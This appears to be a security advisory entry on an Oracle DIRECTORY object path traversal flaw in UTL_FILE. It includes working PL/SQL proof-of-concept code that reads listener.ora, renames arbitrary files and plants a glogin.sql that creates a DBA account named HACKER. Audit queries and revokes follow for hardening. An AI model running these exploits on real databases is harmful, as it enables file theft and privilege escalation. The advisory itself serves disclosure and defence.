Threat Finder

Threat ID
87
Threat Date
08/06/2007
Threat Name
DIRECTORY object path traversal
CVE Reference
CVE-2005-0298
CVE-2005-0701
CVE-2006-7141
CCE Reference
CCE-NO-MATCH
Risk
High
Database Type
Oracle
Category
Patchable Vulnerabilities
Versions
Oracle 10g Release 1, 9i and 8i
Summary
Sensitive information can be disclosed and modified by abusing the DIRECTORY object. A specially crafted path supplied together with a DIRECTORY object lets a low-privileged remote attacker access arbitrary files on the database server's operating system.
Overview
Oracle's PL/SQL extension provides DIRECTORY objects for accessing filesystem resources on the server. One can create a DIRECTORY object by specifying a name and the physical path it points to.
CREATE DIRECTORY [name] AS [path]
Various built-in PL/SQL functions take a DIRECTORY object plus a relative path when accessing the server's filesystem, and access is meant to be restricted to locations within the directory's configured path. However, some of these functions do not properly validate the user-supplied path, allowing access to files and directories located outside of the specified paths.
A malicious attacker can use this to read, modify or destroy sensitive information. For example, an attacker can gain unauthenticated access to the system by adding an entry to the $HOME/.rhosts file.

One package known to be vulnerable to this type of attack is UTL_FILE. Below is an example that uses UTL_FILE to read the listener.ora file.

SET SERVEROUTPUT ON
DECLARE
  f       utl_file.file_type;
  sBuffer VARCHAR2(8000);
BEGIN
  -- The traversal sequence in the filename escapes the path that MEDIA_DIR points to
  f := UTL_FILE.FOPEN('MEDIA_DIR', '\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\$ORACLE_HOME\ora90\network\ADMIN\listener.ora', 'r');
  LOOP
    UTL_FILE.GET_LINE(f, sBuffer);   -- raises NO_DATA_FOUND at end of file
    DBMS_OUTPUT.PUT_LINE(sBuffer);
  END LOOP;
EXCEPTION
  WHEN NO_DATA_FOUND THEN
    UTL_FILE.FCLOSE(f);
END;
/


-- Write a file (here glogin.sql) outside the directory referenced by the MEDIA_DIR directory object.
DECLARE
  f utl_file.file_type;
BEGIN
  f := UTL_FILE.FOPEN('MEDIA_DIR', '\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\glogin.sql', 'w', 1000);
  UTL_FILE.PUT_LINE(f, 'CREATE USER HACKER IDENTIFIED BY HACKER;', TRUE);
  UTL_FILE.PUT_LINE(f, 'GRANT DBA TO HACKER;', TRUE);
  UTL_FILE.FCLOSE(f);
END;
/

-- Read arbitrary files on the same drive as the directory referenced by the MEDIA_DIR directory object.
SET SERVEROUTPUT ON
DECLARE
  f       utl_file.file_type;
  sBuffer VARCHAR2(8000);
BEGIN
  f := UTL_FILE.FOPEN('MEDIA_DIR', '\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\oracle\ora92\network\ADMIN\listener.ora', 'r');
  LOOP
    UTL_FILE.GET_LINE(f, sBuffer);   -- raises NO_DATA_FOUND at end of file
    DBMS_OUTPUT.PUT_LINE(sBuffer);
  END LOOP;
EXCEPTION
  WHEN NO_DATA_FOUND THEN
    UTL_FILE.FCLOSE(f);
END;
/

-- Rename any file on the same drive as the directory referenced by the MEDIA_DIR directory object.
BEGIN
  UTL_FILE.FRENAME('MEDIA_DIR', '\\.\\..\\.\\..\\.\\myoldtextfile.txt',
                   'MEDIA_DIR', '\\.\\..\\.\\..\\.\\mynewtextfile.txt', TRUE);
END;
/


Since PUBLIC has EXECUTE on UTL_FILE by default, any account that has been granted access to MEDIA_DIR can successfully execute this code.

Other PL/SQL functions that parse paths in the same way are likely to be vulnerable as well.
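The following audit and hardening statements are an added example and are not part of the original advisory. They assume a DBA-privileged SQL*Plus session; app_batch_user is a placeholder for an account that genuinely needs UTL_FILE.

```sql
-- Added example (not from the advisory): find exposure to DIRECTORY path traversal.
-- Assumes a DBA session; app_batch_user is a placeholder account name.

-- 1. Every DIRECTORY object and the OS path it points to.
--    A traversal in the filename escapes from these paths, so note any that
--    sit on the same drive as ORACLE_HOME or other sensitive files.
SELECT owner, directory_name, directory_path
  FROM dba_directories
 ORDER BY directory_name;

-- 2. Who can READ or WRITE through each DIRECTORY object.
--    Directory privileges are recorded in DBA_TAB_PRIVS with OWNER = 'SYS'
--    and TABLE_NAME = the directory name; a PUBLIC grantee is the risk.
SELECT grantee, table_name AS directory_name, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN (SELECT directory_name FROM dba_directories)
 ORDER BY table_name, grantee;

-- 3. Who can execute UTL_FILE (PUBLIC by default, as the advisory notes).
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_FILE'
 ORDER BY grantee;

-- 4. Hardening: withdraw the default PUBLIC grant and re-grant only to
--    accounts that need it. Applying the vendor patch listed in the
--    references remains the actual fix; this only shrinks who can reach the bug.
REVOKE EXECUTE ON utl_file FROM PUBLIC;
GRANT EXECUTE ON utl_file TO app_batch_user;

-- 5. Likewise, remove any PUBLIC access to directory objects that remain.
REVOKE READ, WRITE ON DIRECTORY media_dir FROM PUBLIC;
```

Re-run queries 2 and 3 after the revokes to confirm that no PUBLIC rows remain; applications that break afterwards identify the accounts that need an explicit grant.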
References
http://download-west.oracle.com/docs/cd/B10501_01/appdev.920/a96612/u_file.htm#ARPLS069
http://petefinnigan.com/directory_traversal.pdf
http://www.argeniss.com/research/ARGENISS-ADV-030501.txt
http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf

Additional information including fix script information is available in the licensed versions of Application Security's DbProtect and AppDetectivePro solutions.
